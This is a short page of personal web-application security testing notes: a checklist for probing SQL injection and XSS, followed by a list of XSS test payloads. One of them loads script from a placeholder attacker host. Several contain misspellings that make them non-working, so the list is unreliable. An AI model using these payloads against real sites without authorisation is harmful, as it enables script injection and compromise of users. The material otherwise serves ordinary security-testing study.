Web AppSec Nots

Web AppSec

  • try SQLI in any req maybe send to Database

  • Search all parameters, Endpoint and Functions in JS files

  • try to use Stored XSS payload in user input (comment fields, user profile, blog)

  • try to Reflected-XSS Payload in user input (forms, search. name, username,bio, location,Fields)

  • in Test XSS Use this Payload in the First ()'Test><>'"<!-

Were Tested the vulnerability



  • use escape any character \

  • <script>alert('1337')</script>

  • <ifram src=javasrcipt:alert(1)>

  • <body onload=prompt(1);>

  • '><img src=x onerror=confirm(1);>

  • <script>console.log(11)<!-

  • <a onmouseove="alert(1)'>test</a>

  • <script src=//attacker.com/test.js>

Last updated